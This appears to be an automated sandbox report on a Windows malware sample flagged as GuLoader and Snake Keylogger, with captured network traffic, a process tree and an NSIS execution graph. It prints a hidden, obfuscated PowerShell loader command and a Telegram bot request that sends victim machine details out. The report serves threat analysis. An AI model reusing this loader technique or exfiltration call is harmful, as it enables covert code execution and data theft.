                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1674&rtt_var=660&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1744324&cwnd=229&unsent_bytes=0&cid=167ae2b3e6129341&ts=158&x=0"
                                                                                                                  2025-01-10 16:09:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.1150000149.154.167.2204431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:29 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:29 UTC344INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:29 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 16:09:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:11:07:24
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\RmIYOfX0yO.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\RmIYOfX0yO.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:789'280 bytes
                                                                                                                  MD5 hash:5E2FF1914FC1F8EBADF282F4096D6FC8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:11:07:26
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
                                                                                                                  Imagebase:0x880000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2191615306.000000000D623000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:11:07:26
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:9
                                                                                                                  Start time:11:08:52
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                  Imagebase:0x7e0000
                                                                                                                  File size:59'904 bytes
                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:23.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:21.4%
                                                                                                                    Total number of Nodes:1357
                                                                                                                    Total number of Limit Nodes:45
                                                                                                                    execution_graph 4024 402840 4025 402bbf 18 API calls 4024->4025 4027 40284e 4025->4027 4026 402864 4029 405d33 2 API calls 4026->4029 4027->4026 4028 402bbf 18 API calls 4027->4028 4028->4026 4030 40286a 4029->4030 4052 405d58 GetFileAttributesW CreateFileW 4030->4052 4032 402877 4033 402883 GlobalAlloc 4032->4033 4034 40291a 4032->4034 4037 402911 CloseHandle 4033->4037 4038 40289c 4033->4038 4035 402922 DeleteFileW 4034->4035 4036 402935 4034->4036 4035->4036 4037->4034 4053 40336e SetFilePointer 4038->4053 4040 4028a2 4041 403358 ReadFile 4040->4041 4042 4028ab GlobalAlloc 4041->4042 4043 4028bb 4042->4043 4044 4028ef 4042->4044 4045 4030e7 45 API calls 4043->4045 4046 405e0a WriteFile 4044->4046 4047 4028c8 4045->4047 4048 4028fb GlobalFree 4046->4048 4050 4028e6 GlobalFree 4047->4050 4049 4030e7 45 API calls 4048->4049 4051 40290e 4049->4051 4050->4044 4051->4037 4052->4032 4053->4040 4054 401cc0 4055 402ba2 18 API calls 4054->4055 4056 401cc7 4055->4056 4057 402ba2 18 API calls 4056->4057 4058 401ccf GetDlgItem 4057->4058 4059 402531 4058->4059 4060 4029c0 4061 402ba2 18 API calls 4060->4061 4062 4029c6 4061->4062 4063 40281e 4062->4063 4064 4029f9 4062->4064 4066 4029d4 4062->4066 4064->4063 4065 4061a5 18 API calls 4064->4065 4065->4063 4066->4063 4068 4060ca wsprintfW 4066->4068 4068->4063 3238 401fc3 3239 401fd5 3238->3239 3240 402087 3238->3240 3258 402bbf 3239->3258 3242 401423 25 API calls 3240->3242 3248 4021e1 3242->3248 3244 402bbf 18 API calls 3245 401fe5 3244->3245 3246 401ffb LoadLibraryExW 3245->3246 3247 401fed GetModuleHandleW 3245->3247 3246->3240 3249 40200c 3246->3249 3247->3246 3247->3249 3264 4065c8 WideCharToMultiByte 3249->3264 3252 402056 3254 4052e2 25 API calls 3252->3254 3253 40201d 3256 40202d 3253->3256 3267 401423 3253->3267 3254->3256 3256->3248 3257 402079 FreeLibrary 3256->3257 3257->3248 3259 402bcb 3258->3259 3260 4061a5 18 API calls 3259->3260 3261 402bec 3260->3261 3262 401fdc 3261->3262 3263 406417 5 API calls 3261->3263 3262->3244 3263->3262 3265 4065f2 GetProcAddress 3264->3265 3266 402017 3264->3266 3265->3266 3266->3252 3266->3253 3268 4052e2 25 API calls 3267->3268 3269 401431 3268->3269 3269->3256 4069 4016c4 4070 402bbf 18 API calls 4069->4070 4071 4016ca GetFullPathNameW 4070->4071 4074 4016e4 4071->4074 4078 401706 4071->4078 4072 40171b GetShortPathNameW 4073 402a4c 4072->4073 4075 4064c6 2 API calls 4074->4075 4074->4078 4076 4016f6 4075->4076 4076->4078 4079 406183 lstrcpynW 4076->4079 4078->4072 4078->4073 4079->4078 4080 406847 4084 4066cb 4080->4084 4081 407036 4082 406755 GlobalAlloc 4082->4081 4082->4084 4083 40674c GlobalFree 4083->4082 4084->4081 4084->4082 4084->4083 4084->4084 4085 4067c3 GlobalFree 4084->4085 4086 4067cc GlobalAlloc 4084->4086 4085->4086 4086->4081 4086->4084 3454 4014cb 3455 4052e2 25 API calls 3454->3455 3456 4014d2 3455->3456 4087 40194e 4088 402bbf 18 API calls 4087->4088 4089 401955 lstrlenW 4088->4089 4090 402531 4089->4090 4091 4027ce 4092 4027d6 4091->4092 4093 4027da FindNextFileW 4092->4093 4095 4027ec 4092->4095 4094 402833 4093->4094 4093->4095 4097 406183 lstrcpynW 4094->4097 4097->4095 3533 401754 3534 402bbf 18 API calls 3533->3534 3535 40175b 3534->3535 3539 405d87 3535->3539 3537 401762 3538 405d87 2 API calls 3537->3538 3538->3537 3540 405d94 GetTickCount GetTempFileNameW 3539->3540 3541 405dce 3540->3541 3542 405dca 3540->3542 3541->3537 3542->3540 3542->3541 4105 405256 4106 405266 4105->4106 4107 40527a 4105->4107 4108 4052c3 4106->4108 4109 40526c 4106->4109 4110 405282 IsWindowVisible 4107->4110 4116 405299 4107->4116 4111 4052c8 CallWindowProcW 4108->4111 4112 404293 SendMessageW 4109->4112 4110->4108 4113 40528f 4110->4113 4114 405276 4111->4114 4112->4114 4118 404bac SendMessageW 4113->4118 4116->4111 4123 404c2c 4116->4123 4119 404c0b SendMessageW 4118->4119 4120 404bcf GetMessagePos ScreenToClient SendMessageW 4118->4120 4121 404c03 4119->4121 4120->4121 4122 404c08 4120->4122 4121->4116 4122->4119 4132 406183 lstrcpynW 4123->4132 4125 404c3f 4133 4060ca wsprintfW 4125->4133 4127 404c49 4128 40140b 2 API calls 4127->4128 4129 404c52 4128->4129 4134 406183 lstrcpynW 4129->4134 4131 404c59 4131->4108 4132->4125 4133->4127 4134->4131 4135 401d56 GetDC GetDeviceCaps 4136 402ba2 18 API calls 4135->4136 4137 401d74 MulDiv ReleaseDC 4136->4137 4138 402ba2 18 API calls 4137->4138 4139 401d93 4138->4139 4140 4061a5 18 API calls 4139->4140 4141 401dcc CreateFontIndirectW 4140->4141 4142 402531 4141->4142 4143 401a57 4144 402ba2 18 API calls 4143->4144 4145 401a5d 4144->4145 4146 402ba2 18 API calls 4145->4146 4147 401a05 4146->4147 4148 4014d7 4149 402ba2 18 API calls 4148->4149 4150 4014dd Sleep 4149->4150 4152 402a4c 4150->4152 4153 40435b lstrcpynW lstrlenW 4154 40155b 4155 4029f2 4154->4155 4158 4060ca wsprintfW 4155->4158 4157 4029f7 4158->4157 3972 401ddc 3973 402ba2 18 API calls 3972->3973 3974 401de2 3973->3974 3975 402ba2 18 API calls 3974->3975 3976 401deb 3975->3976 3977 401df2 ShowWindow 3976->3977 3978 401dfd EnableWindow 3976->3978 3979 402a4c 3977->3979 3978->3979 4159 404c5e GetDlgItem GetDlgItem 4160 404cb0 7 API calls 4159->4160 4168 404ec9 4159->4168 4161 404d53 DeleteObject 4160->4161 4162 404d46 SendMessageW 4160->4162 4163 404d5c 4161->4163 4162->4161 4165 404d93 4163->4165 4167 4061a5 18 API calls 4163->4167 4164 404fad 4166 405059 4164->4166 4175 405006 SendMessageW 4164->4175 4202 404ebc 4164->4202 4169 404247 19 API calls 4165->4169 4171 405063 SendMessageW 4166->4171 4172 40506b 4166->4172 4173 404d75 SendMessageW SendMessageW 4167->4173 4168->4164 4170 404f3a 4168->4170 4179 404bac 5 API calls 4168->4179 4174 404da7 4169->4174 4170->4164 4177 404f9f SendMessageW 4170->4177 4171->4172 4178 405094 4172->4178 4185 405084 4172->4185 4186 40507d ImageList_Destroy 4172->4186 4173->4163 4180 404247 19 API calls 4174->4180 4183 40501b SendMessageW 4175->4183 4175->4202 4176 4042ae 8 API calls 4184 40524f 4176->4184 4177->4164 4182 405203 4178->4182 4201 404c2c 4 API calls 4178->4201 4206 4050cf 4178->4206 4179->4170 4181 404db5 4180->4181 4187 404e8a GetWindowLongW SetWindowLongW 4181->4187 4195 404e05 SendMessageW 4181->4195 4197 404e84 4181->4197 4199 404e41 SendMessageW 4181->4199 4200 404e52 SendMessageW 4181->4200 4190 405215 ShowWindow GetDlgItem ShowWindow 4182->4190 4182->4202 4189 40502e 4183->4189 4185->4178 4188 40508d GlobalFree 4185->4188 4186->4185 4191 404ea3 4187->4191 4188->4178 4196 40503f SendMessageW 4189->4196 4190->4202 4192 404ec1 4191->4192 4193 404ea9 ShowWindow 4191->4193 4211 40427c SendMessageW 4192->4211 4210 40427c SendMessageW 4193->4210 4195->4181 4196->4166 4197->4187 4197->4191 4199->4181 4200->4181 4201->4206 4202->4176 4203 4051d9 InvalidateRect 4203->4182 4204 4051ef 4203->4204 4212 404b67 4204->4212 4205 4050fd SendMessageW 4209 405113 4205->4209 4206->4205 4206->4209 4208 405187 SendMessageW SendMessageW 4208->4209 4209->4203 4209->4208 4210->4202 4211->4168 4215 404a9e 4212->4215 4214 404b7c 4214->4182 4216 404ab7 4215->4216 4217 4061a5 18 API calls 4216->4217 4218 404b1b 4217->4218 4219 4061a5 18 API calls 4218->4219 4220 404b26 4219->4220 4221 4061a5 18 API calls 4220->4221 4222 404b3c lstrlenW wsprintfW SetDlgItemTextW 4221->4222 4222->4214 4223 401bdf 4224 402ba2 18 API calls 4223->4224 4225 401be6 4224->4225 4226 402ba2 18 API calls 4225->4226 4227 401bf0 4226->4227 4229 401c00 4227->4229 4230 402bbf 18 API calls 4227->4230 4228 401c10 4232 401c1b 4228->4232 4233 401c5f 4228->4233 4229->4228 4231 402bbf 18 API calls 4229->4231 4230->4229 4231->4228 4234 402ba2 18 API calls 4232->4234 4235 402bbf 18 API calls 4233->4235 4236 401c20 4234->4236 4237 401c64 4235->4237 4238 402ba2 18 API calls 4236->4238 4239 402bbf 18 API calls 4237->4239 4241 401c29 4238->4241 4240 401c6d FindWindowExW 4239->4240 4244 401c8f 4240->4244 4242 401c31 SendMessageTimeoutW 4241->4242 4243 401c4f SendMessageW 4241->4243 4242->4244 4243->4244 4245 4022df 4246 402bbf 18 API calls 4245->4246 4247 4022ee 4246->4247 4248 402bbf 18 API calls 4247->4248 4249 4022f7 4248->4249 4250 402bbf 18 API calls 4249->4250 4251 402301 GetPrivateProfileStringW 4250->4251 4252 401960 4253 402ba2 18 API calls 4252->4253 4254 401967 4253->4254 4255 402ba2 18 API calls 4254->4255 4256 401971 4255->4256 4257 402bbf 18 API calls 4256->4257 4258 40197a 4257->4258 4259 40198e lstrlenW 4258->4259 4260 4019ca 4258->4260 4261 401998 4259->4261 4261->4260 4265 406183 lstrcpynW 4261->4265 4263 4019b3 4263->4260 4264 4019c0 lstrlenW 4263->4264 4264->4260 4265->4263 4266 401662 4267 402bbf 18 API calls 4266->4267 4268 401668 4267->4268 4269 4064c6 2 API calls 4268->4269 4270 40166e 4269->4270 4271 4046e2 4272 40470e 4271->4272 4273 40471f 4271->4273 4332 4058ac GetDlgItemTextW 4272->4332 4275 40472b GetDlgItem 4273->4275 4276 40478a 4273->4276 4278 40473f 4275->4278 4283 4061a5 18 API calls 4276->4283 4293 40486e 4276->4293 4330 404a1d 4276->4330 4277 404719 4279 406417 5 API calls 4277->4279 4281 404753 SetWindowTextW 4278->4281 4282 405be2 4 API calls 4278->4282 4279->4273 4285 404247 19 API calls 4281->4285 4287 404749 4282->4287 4288 4047fe SHBrowseForFolderW 4283->4288 4284 40489e 4289 405c3f 18 API calls 4284->4289 4290 40476f 4285->4290 4286 4042ae 8 API calls 4291 404a31 4286->4291 4287->4281 4296 405b37 3 API calls 4287->4296 4292 404816 CoTaskMemFree 4288->4292 4288->4293 4294 4048a4 4289->4294 4295 404247 19 API calls 4290->4295 4297 405b37 3 API calls 4292->4297 4293->4330 4334 4058ac GetDlgItemTextW 4293->4334 4335 406183 lstrcpynW 4294->4335 4298 40477d 4295->4298 4296->4281 4299 404823 4297->4299 4333 40427c SendMessageW 4298->4333 4302 40485a SetDlgItemTextW 4299->4302 4307 4061a5 18 API calls 4299->4307 4302->4293 4303 404783 4305 406559 5 API calls 4303->4305 4304 4048bb 4306 406559 5 API calls 4304->4306 4305->4276 4313 4048c2 4306->4313 4308 404842 lstrcmpiW 4307->4308 4308->4302 4311 404853 lstrcatW 4308->4311 4309 404903 4336 406183 lstrcpynW 4309->4336 4311->4302 4312 40490a 4314 405be2 4 API calls 4312->4314 4313->4309 4317 405b83 2 API calls 4313->4317 4319 40495b 4313->4319 4315 404910 GetDiskFreeSpaceW 4314->4315 4318 404934 MulDiv 4315->4318 4315->4319 4317->4313 4318->4319 4320 4049cc 4319->4320 4322 404b67 21 API calls 4319->4322 4321 4049ef 4320->4321 4323 40140b 2 API calls 4320->4323 4337 404269 KiUserCallbackDispatcher 4321->4337 4324 4049b9 4322->4324 4323->4321 4326 4049ce SetDlgItemTextW 4324->4326 4327 4049be 4324->4327 4326->4320 4329 404a9e 21 API calls 4327->4329 4328 404a0b 4328->4330 4338 404677 4328->4338 4329->4320 4330->4286 4332->4277 4333->4303 4334->4284 4335->4304 4336->4312 4337->4328 4339 404685 4338->4339 4340 40468a SendMessageW 4338->4340 4339->4340 4340->4330 4341 4043e4 4342 4043fc 4341->4342 4346 404516 4341->4346 4347 404247 19 API calls 4342->4347 4343 404580 4344 404652 4343->4344 4345 40458a GetDlgItem 4343->4345 4352 4042ae 8 API calls 4344->4352 4348 404613 4345->4348 4349 4045a4 4345->4349 4346->4343 4346->4344 4350 404551 GetDlgItem SendMessageW 4346->4350 4351 404463 4347->4351 4348->4344 4353 404625 4348->4353 4349->4348 4356 4045ca 6 API calls 4349->4356 4372 404269 KiUserCallbackDispatcher 4350->4372 4355 404247 19 API calls 4351->4355 4362 40464d 4352->4362 4357 40463b 4353->4357 4358 40462b SendMessageW 4353->4358 4360 404470 CheckDlgButton 4355->4360 4356->4348 4361 404641 SendMessageW 4357->4361 4357->4362 4358->4357 4359 40457b 4363 404677 SendMessageW 4359->4363 4370 404269 KiUserCallbackDispatcher 4360->4370 4361->4362 4363->4343 4365 40448e GetDlgItem 4371 40427c SendMessageW 4365->4371 4367 4044a4 SendMessageW 4368 4044c1 GetSysColor 4367->4368 4369 4044ca SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4367->4369 4368->4369 4369->4362 4370->4365 4371->4367 4372->4359 4373 4019e4 4374 402bbf 18 API calls 4373->4374 4375 4019eb 4374->4375 4376 402bbf 18 API calls 4375->4376 4377 4019f4 4376->4377 4378 4019fb lstrcmpiW 4377->4378 4379 401a0d lstrcmpW 4377->4379 4380 401a01 4378->4380 4379->4380 4381 4025e5 4382 402ba2 18 API calls 4381->4382 4389 4025f4 4382->4389 4383 40272d 4384 40263a ReadFile 4384->4383 4384->4389 4385 405ddb ReadFile 4385->4389 4386 40267a MultiByteToWideChar 4386->4389 4387 40272f 4403 4060ca wsprintfW 4387->4403 4389->4383 4389->4384 4389->4385 4389->4386 4389->4387 4391 4026a0 SetFilePointer MultiByteToWideChar 4389->4391 4393 402740 4389->4393 4394 405e39 SetFilePointer 4389->4394 4391->4389 4392 402761 SetFilePointer 4392->4383 4393->4383 4393->4392 4395 405e55 4394->4395 4396 405e71 4394->4396 4397 405ddb ReadFile 4395->4397 4396->4389 4398 405e61 4397->4398 4398->4396 4399 405ea2 SetFilePointer 4398->4399 4400 405e7a SetFilePointer 4398->4400 4399->4396 4400->4399 4401 405e85 4400->4401 4402 405e0a WriteFile 4401->4402 4402->4396 4403->4383 3270 401e66 3271 402bbf 18 API calls 3270->3271 3272 401e6c 3271->3272 3273 4052e2 25 API calls 3272->3273 3274 401e76 3273->3274 3288 405863 CreateProcessW 3274->3288 3277 401edb CloseHandle 3280 40281e 3277->3280 3278 401e8c WaitForSingleObject 3279 401e9e 3278->3279 3281 401eb0 GetExitCodeProcess 3279->3281 3291 406595 3279->3291 3283 401ec2 3281->3283 3284 401ecf 3281->3284 3295 4060ca wsprintfW 3283->3295 3284->3277 3285 401ecd 3284->3285 3285->3277 3289 401e7c 3288->3289 3290 405896 CloseHandle 3288->3290 3289->3277 3289->3278 3289->3280 3290->3289 3292 4065b2 PeekMessageW 3291->3292 3293 401ea5 WaitForSingleObject 3292->3293 3294 4065a8 DispatchMessageW 3292->3294 3293->3279 3294->3292 3295->3285 4404 406ae6 4406 4066cb 4404->4406 4405 407036 4406->4405 4407 406755 GlobalAlloc 4406->4407 4408 40674c GlobalFree 4406->4408 4409 4067c3 GlobalFree 4406->4409 4410 4067cc GlobalAlloc 4406->4410 4407->4405 4407->4406 4408->4407 4409->4410 4410->4405 4410->4406 3296 401767 3297 402bbf 18 API calls 3296->3297 3298 40176e 3297->3298 3299 401796 3298->3299 3300 40178e 3298->3300 3354 406183 lstrcpynW 3299->3354 3353 406183 lstrcpynW 3300->3353 3303 401794 3307 406417 5 API calls 3303->3307 3304 4017a1 3355 405b37 lstrlenW CharPrevW 3304->3355 3320 4017b3 3307->3320 3311 4017c5 CompareFileTime 3311->3320 3312 401885 3313 4052e2 25 API calls 3312->3313 3315 40188f 3313->3315 3314 406183 lstrcpynW 3314->3320 3338 4030e7 3315->3338 3316 4052e2 25 API calls 3317 401871 3316->3317 3320->3311 3320->3312 3320->3314 3322 4061a5 18 API calls 3320->3322 3333 40185c 3320->3333 3334 405d33 GetFileAttributesW 3320->3334 3337 405d58 GetFileAttributesW CreateFileW 3320->3337 3358 4064c6 FindFirstFileW 3320->3358 3361 4058c8 3320->3361 3321 4018b6 SetFileTime 3323 4018c8 CloseHandle 3321->3323 3322->3320 3323->3317 3324 4018d9 3323->3324 3325 4018f1 3324->3325 3326 4018de 3324->3326 3327 4061a5 18 API calls 3325->3327 3328 4061a5 18 API calls 3326->3328 3329 4018f9 3327->3329 3331 4018e6 lstrcatW 3328->3331 3332 4058c8 MessageBoxIndirectW 3329->3332 3331->3329 3332->3317 3333->3316 3333->3317 3335 405d52 3334->3335 3336 405d45 SetFileAttributesW 3334->3336 3335->3320 3336->3335 3337->3320 3339 403112 3338->3339 3340 4030f6 SetFilePointer 3338->3340 3365 4031ef GetTickCount 3339->3365 3340->3339 3345 4031ef 43 API calls 3346 403149 3345->3346 3348 4031b5 ReadFile 3346->3348 3351 403158 3346->3351 3352 4018a2 3346->3352 3348->3352 3349 405ddb ReadFile 3349->3351 3351->3349 3351->3352 3380 405e0a WriteFile 3351->3380 3352->3321 3352->3323 3353->3303 3354->3304 3356 405b53 lstrcatW 3355->3356 3357 4017a7 lstrcatW 3355->3357 3356->3357 3357->3303 3359 4064e7 3358->3359 3360 4064dc FindClose 3358->3360 3359->3320 3360->3359 3362 4058dd 3361->3362 3363 405929 3362->3363 3364 4058f1 MessageBoxIndirectW 3362->3364 3363->3320 3364->3363 3366 403347 3365->3366 3367 40321d 3365->3367 3368 402d9f 33 API calls 3366->3368 3382 40336e SetFilePointer 3367->3382 3374 403119 3368->3374 3370 403228 SetFilePointer 3376 40324d 3370->3376 3374->3352 3378 405ddb ReadFile 3374->3378 3375 405e0a WriteFile 3375->3376 3376->3374 3376->3375 3377 403328 SetFilePointer 3376->3377 3383 403358 3376->3383 3386 406698 3376->3386 3393 402d9f 3376->3393 3377->3366 3379 403132 3378->3379 3379->3345 3379->3352 3381 405e28 3380->3381 3381->3351 3382->3370 3384 405ddb ReadFile 3383->3384 3385 40336b 3384->3385 3385->3376 3387 4066bd 3386->3387 3388 4066c5 3386->3388 3387->3376 3388->3387 3389 406755 GlobalAlloc 3388->3389 3390 40674c GlobalFree 3388->3390 3391 4067c3 GlobalFree 3388->3391 3392 4067cc GlobalAlloc 3388->3392 3389->3387 3389->3388 3390->3389 3391->3392 3392->3387 3392->3388 3394 402db0 3393->3394 3395 402dc8 3393->3395 3396 402dc0 3394->3396 3397 402db9 DestroyWindow 3394->3397 3398 402dd0 3395->3398 3399 402dd8 GetTickCount 3395->3399 3396->3376 3397->3396 3400 406595 2 API calls 3398->3400 3399->3396 3401 402de6 3399->3401 3400->3396 3402 402e1b CreateDialogParamW ShowWindow 3401->3402 3403 402dee 3401->3403 3402->3396 3403->3396 3408 402d83 3403->3408 3405 402dfc wsprintfW 3406 4052e2 25 API calls 3405->3406 3407 402e19 3406->3407 3407->3396 3409 402d92 3408->3409 3410 402d94 MulDiv 3408->3410 3409->3410 3410->3405 4411 401ee9 4412 402bbf 18 API calls 4411->4412 4413 401ef0 4412->4413 4414 4064c6 2 API calls 4413->4414 4415 401ef6 4414->4415 4417 401f07 4415->4417 4418 4060ca wsprintfW 4415->4418 4418->4417 3423 4021ea 3424 402bbf 18 API calls 3423->3424 3425 4021f0 3424->3425 3426 402bbf 18 API calls 3425->3426 3427 4021f9 3426->3427 3428 402bbf 18 API calls 3427->3428 3429 402202 3428->3429 3430 4064c6 2 API calls 3429->3430 3431 40220b 3430->3431 3432 40221c lstrlenW lstrlenW 3431->3432 3433 40220f 3431->3433 3435 4052e2 25 API calls 3432->3435 3434 4052e2 25 API calls 3433->3434 3437 402217 3433->3437 3434->3437 3436 40225a SHFileOperationW 3435->3436 3436->3433 3436->3437 4419 40156b 4420 401584 4419->4420 4421 40157b ShowWindow 4419->4421 4422 401592 ShowWindow 4420->4422 4423 402a4c 4420->4423 4421->4420 4422->4423 4424 40226e 4425 402275 4424->4425 4428 402288 4424->4428 4426 4061a5 18 API calls 4425->4426 4427 402282 4426->4427 4429 4058c8 MessageBoxIndirectW 4427->4429 4429->4428 3457 403d6f 3458 403ec2 3457->3458 3459 403d87 3457->3459 3461 403ed3 GetDlgItem GetDlgItem 3458->3461 3470 403f13 3458->3470 3459->3458 3460 403d93 3459->3460 3462 403db1 3460->3462 3463 403d9e SetWindowPos 3460->3463 3464 404247 19 API calls 3461->3464 3467 403db6 ShowWindow 3462->3467 3468 403dce 3462->3468 3463->3462 3469 403efd SetClassLongW 3464->3469 3465 403f6d 3466 404293 SendMessageW 3465->3466 3475 403ebd 3465->3475 3517 403f7f 3466->3517 3467->3468 3471 403df0 3468->3471 3472 403dd6 DestroyWindow 3468->3472 3473 40140b 2 API calls 3469->3473 3470->3465 3474 401389 2 API calls 3470->3474 3477 403df5 SetWindowLongW 3471->3477 3478 403e06 3471->3478 3476 4041d0 3472->3476 3473->3470 3479 403f45 3474->3479 3476->3475 3486 404201 ShowWindow 3476->3486 3477->3475 3482 403e12 GetDlgItem 3478->3482 3483 403eaf 3478->3483 3479->3465 3484 403f49 SendMessageW 3479->3484 3480 40140b 2 API calls 3480->3517 3481 4041d2 DestroyWindow EndDialog 3481->3476 3487 403e42 3482->3487 3488 403e25 SendMessageW IsWindowEnabled 3482->3488 3485 4042ae 8 API calls 3483->3485 3484->3475 3485->3475 3486->3475 3490 403e4f 3487->3490 3491 403e96 SendMessageW 3487->3491 3492 403e62 3487->3492 3500 403e47 3487->3500 3488->3475 3488->3487 3489 4061a5 18 API calls 3489->3517 3490->3491 3490->3500 3491->3483 3495 403e6a 3492->3495 3496 403e7f 3492->3496 3493 404220 SendMessageW 3497 403e7d 3493->3497 3494 404247 19 API calls 3494->3517 3530 40140b 3495->3530 3499 40140b 2 API calls 3496->3499 3497->3483 3501 403e86 3499->3501 3500->3493 3501->3483 3501->3500 3502 404247 19 API calls 3503 403ffa GetDlgItem 3502->3503 3504 404017 ShowWindow KiUserCallbackDispatcher 3503->3504 3505 40400f 3503->3505 3527 404269 KiUserCallbackDispatcher 3504->3527 3505->3504 3507 404041 EnableWindow 3510 404055 3507->3510 3508 40405a GetSystemMenu EnableMenuItem SendMessageW 3509 40408a SendMessageW 3508->3509 3508->3510 3509->3510 3510->3508 3528 40427c SendMessageW 3510->3528 3529 406183 lstrcpynW 3510->3529 3513 4040b8 lstrlenW 3514 4061a5 18 API calls 3513->3514 3515 4040ce SetWindowTextW 3514->3515 3516 401389 2 API calls 3515->3516 3516->3517 3517->3475 3517->3480 3517->3481 3517->3489 3517->3494 3517->3502 